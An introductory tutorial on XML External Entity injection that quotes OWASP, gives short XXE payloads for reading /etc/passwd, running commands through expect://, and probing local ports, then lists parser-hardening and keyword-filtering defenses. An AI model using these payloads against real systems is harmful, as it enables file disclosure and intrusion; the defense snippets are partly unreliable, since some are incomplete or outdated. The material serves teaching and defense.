Introduce to XML Entity Injection Vulnerability

XML Entity Injection (XXE)

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

The XML 1.0 standard defines the structure of an XML document. The standard defines a concept called an entity, which is a storage unit of some type. There are a few different types of entities, external general/parameter parsed entity often shortened to the external entity, that can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI that can be dereferenced (accessed) by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information normally not accessible by the application. Similar attack vectors apply the usage of external DTDs, external stylesheets, external schemas, etc. which, when included, allow similar external resource inclusion style attacks.

 

OWASP

XXE can

  • Read any file
  • Execute system commands
  • Probe the network port
  • Attack Intranet Site

Read any file

<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “file:///etc/passwd” >]>
<root>
<name>&xxe;</name>
</root>

Execute system commands

In the installation expect extended PHP environment in the implementation of system commands, other agreements may also be able to execute system commands

<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “expect://id” >]>
<root>
<name>&xxe;</name>
</root>

Detect intranet port

<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “http://127.0.0.1:80/payload” >]>
<root>
<name>&xxe;</name>
</root>

Attack Intranet Site

Combined with other vulnerabilities such as struts2

<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “http://127.0.0.1:80/payload” >]>
<root>
<name>&xxe;</name>
</root>

Exploit

When allowing the use of external entities, by constructing malicious content, can lead to reading any file, the implementation of system commands, detection of internal network port, attack network site and other hazards.

 The above figure is the default support protocol

Defense XXE attack

  • using the development language provided by the method of disabling external entities
    PHP:
    libxml_disable_entity_loader (true);
    JAVA:
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance ();
    dbf.setExpandEntityReferences (false);
    Python:
    from lxml import etree
    xmlData = etree.parse (xmlSource, etree.XMLParser (resolve_entities = False))
  • filter the user to submit the XML data
    Keywords: <! DOCTYPE and <! ENTITY, or SYSTEM and PUBLIC.